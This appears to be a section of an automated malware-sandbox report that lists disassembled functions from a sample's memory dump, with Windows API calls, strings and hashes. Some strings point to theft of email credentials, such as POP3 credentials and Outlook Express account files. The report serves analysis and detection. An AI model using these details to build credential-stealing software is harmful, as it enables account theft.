                                                                                                                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                              • strchr.MSVCRT ref: 0040371F
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                              • strlen.MSVCRT ref: 00403778
                                                                                                                                                              • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                              • String ID: %s@gmail.com
                                                                                                                                                              • API String ID: 3261640601-4097000612
                                                                                                                                                              • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                              • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004094C8
                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                              • memset.MSVCRT ref: 0040950C
                                                                                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                              • String ID: sysdatetimepick32
                                                                                                                                                              • API String ID: 3411445237-4169760276
                                                                                                                                                              • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                              • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3642520215-0
                                                                                                                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1999381814-0
                                                                                                                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                              • API String ID: 1297977491-3883738016
                                                                                                                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID: gj
                                                                                                                                                              • API String ID: 438689982-4203073231
                                                                                                                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aulldvrm$__aullrem
                                                                                                                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                              • API String ID: 643879872-978417875
                                                                                                                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040810E
                                                                                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                              • API String ID: 524865279-2190619648
                                                                                                                                                              • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                              • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                              • String ID: 0$6
                                                                                                                                                              • API String ID: 2300387033-3849865405
                                                                                                                                                              • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                              • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004076D7
                                                                                                                                                              • sprintf.MSVCRT ref: 00407704
                                                                                                                                                              • strlen.MSVCRT ref: 00407710
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                              • strlen.MSVCRT ref: 00407733
                                                                                                                                                              • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                              • String ID: %s (%s)
                                                                                                                                                              • API String ID: 3756086014-1363028141
                                                                                                                                                              • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                              • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                              • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                              • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                              APIs
                                                                                                                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                              • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                              Strings
                                                                                                                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                              • API String ID: 1640410171-3316789007
                                                                                                                                                              • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                              • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                              • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                              • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscat$memsetsprintf
                                                                                                                                                              • String ID: %2.2X
                                                                                                                                                              • API String ID: 125969286-791839006
                                                                                                                                                              • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                              • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                              • String ID: ACD
                                                                                                                                                              • API String ID: 1886237854-620537770
                                                                                                                                                              • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                              • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004091EC
                                                                                                                                                              • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                              • String ID: caption$dialog_%d
                                                                                                                                                              • API String ID: 2923679083-4161923789
                                                                                                                                                              • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                              • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                              • memset.MSVCRT ref: 00410246
                                                                                                                                                              • memset.MSVCRT ref: 00410258
                                                                                                                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                              • memset.MSVCRT ref: 0041033F
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
